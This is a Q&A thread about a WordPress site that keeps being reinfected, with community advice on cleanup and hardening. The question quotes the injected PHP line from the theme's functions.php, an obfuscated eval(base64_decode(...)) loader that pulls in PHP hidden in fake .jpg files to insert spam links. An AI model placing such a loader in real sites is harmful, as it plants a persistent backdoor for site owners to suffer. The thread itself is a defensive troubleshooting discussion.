# Wordpress Site Keeps Getting Hacked

Tags: wordpress

I have a Wordpress site that keeps getting hacked. As far as I can tell the following changes are being made:

This file has some additional PHP code at the top:

wp-content/themes/enfold/functions.php

as follows:

```
eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7"));
```

and 4 new jpg files are being created:

/wp-includes/images/geo.jpg

/wp-includes/images/save.jpg

/wp-includes/images/magic.jpg

/wp-includes/images/links.jpg

These are not real jpg files as they don't open, but looking at them with a text editor reveals text and additional PHP code.

From looking at the PHP code it looks like it's trying to inject some spam/advertising links into my Wordpress POSTS.

I keep delete these files, I've installed a security plugin, removed the admin login, changed all my passwords but these files continue to get updated/created every few days.

I'm trying to understand how this is possible and what I need to do next to block this.

Comment: Are you using FTP or a cPanel/etc to access the server? It's possible those are compromised.

Comment: You probably have a vulnerable theme or plugin.

Comment: I bet your theme or some active plugins are vulnerable, I encountered many sites like this, usually uses a hard coded theme created  5 years ago.

Comment: I use both cPanel and FTP - I'll change the passwords again for these. I have removed all themes except the active theme and have a minimal set of plugins. Is there a way to tell what might be compromised from log files etc?

Comment: Presumably [you've followed the standard advice in the FAQ](https://codex.wordpress.org/FAQ_My_site_was_hacked)? Because we can't do much here unless you've got some specific code of yours that you suspect that you can post.

Comment: it is not only theme and plugin that can be compromised, but also core. what version are you using ? i would suggest anyhow to delete ALL the files, upload new and fresh wordpress core, theme files ( new from repository ) and plugins ( new ) ...

Answer (score 8, accepted):

First of all - [DON´T PANIC](http://www.realclearscience.com/blog/dontpanicoldT1.jpg).

Installing antivirus or security plugins at this point will rarely help - the malisious code has already server access.

1 - Change ALL the passwords for `FTP`, `mysql` , `DB` ,  `Cpanel` , `WHM` , `SSH` ( disable if not need ) etc. anything with access.

3 - Check your server ( all folders like `cgi`, `cgi-bin`, `ftp`  etc ..)
Delete all the `wordpress` folder ( except `wp-content` ) , and all other strange files . Delete all themes and all plugins anf Check the rest of `wp-content` manually and attentively . Backup the DB and manually check it .

3.1 - ( EDIT 1 ) - Disallow indexes in Cpanel / WHM . And read below for .htaccess protections .

2 - Upload new wordpress CORE files to [OWN directory](https://codex.wordpress.org/Giving_WordPress_Its_Own_Directory) ( not root ) and rename it to something else ( not `wp` or `wordpress` ).

3 - Update Plugin and Themes - do not copy the ones you have , but install fresh, updated ones from the wp plugin repository, and a fresh clean theme .
Manually check if necessary .

In your theme , check for all `forms`, or `input fields`, and check for correct validation of input .

4 - Change all the DB passwords in the `wp-config` . All the hashes etc .
Create a new Database AND user AND new passwords. Manually check the DB backup BEFORE injecting it back .

4.1 - ( EDIT I ) I forgot to mention - Change also the DB prefix. Do not leave `wp`

5 - Change all wp user-passwords AND usernames .
If you have an open site with hundreds of users than make a script to force everyone to change passwords .If you have only a dozen change it manually .
When I said all - It is including the default admin user ( from past versions )

6 - After some time , check your server log , and see if the 404 messages for the fake image files are from a single ip address ( probably not ) - if they are - block it .

7 - There is not much more you can do , except being careful. It is a lot of work, but do not be lazy and follow all steps . Otherwise it is not just this one site, but the whole server could be compromised . Again and Again ,.

Guidelines for that not happening again :

- Choose Strong passwords . - we all do not like passwords that looks like `aDf34HG§*#sFGT`, but they ARE helpful - especially on `DB` or other automated tasks . For users - Force at least one symbol and one letter.
- Do not install themes and plugins that you do not know, do not fully understand , or that you have downloaded from questionable sources (
  `all-wp-premium-themes-for-free-and-direct-download-all-plugins-for-free` etc ).
- Keep the wordpress core files updated .
- Check the server every once in a while manually .

**.htaccess**

Some directives that can prevent ( or at least try to ) this from happening again .

.htaccess file in the root directory of WordPress.

```
#Disallow indexes 
Options All -Indexes

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>

# WPhtC: Protect .htaccess file
<files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
</files>
```

**robots.txt**

```
Disallow: /wp-*
```

Another thing you can do is to force users (and yourself ) to use SSL ( HTTPS ) when login to admin:

```
define('FORCE_SSL_LOGIN', true);
```

After that - you will also need to peek at your DB to see if have strange columns / tables / entries / users. for example if your site is constantly being redirected - check for strings etc .. (`eval()`,`exec()` ..)

You could also use some of the numerous security plugins for core checksums and other the above mentioned `php` calls.

There are other things, more complicated, especially on the APACHE side. 
If I will have more time, I will post a blog entry and link here. But the above written is a good start .

Answer (score 0):

I ran into this problem with a number of my websites and even after swapping everything out (all new files with only one website, but with the same config file)... I got attacked anyway.

Every day I'd wake up to email alerts saying 30 different files have been edited or replaced. Every time I cleaned it, it would come back a few hours later... But was puzzled since it was all new files. Only thing that was the same was the *wp-config.php* file.

Turns out the Hash keys were just way too short. Sites were built 3 years ago but fully updated to this point, but as soon as I changed the hash keys to be a lot longer, then the problem stopped.

Example of hash keys:

[image: EXAMPLE IMAGE OF HASH KEYS]

Here's where you can go to generate new keys:
https://api.wordpress.org/secret-key/1.1/salt/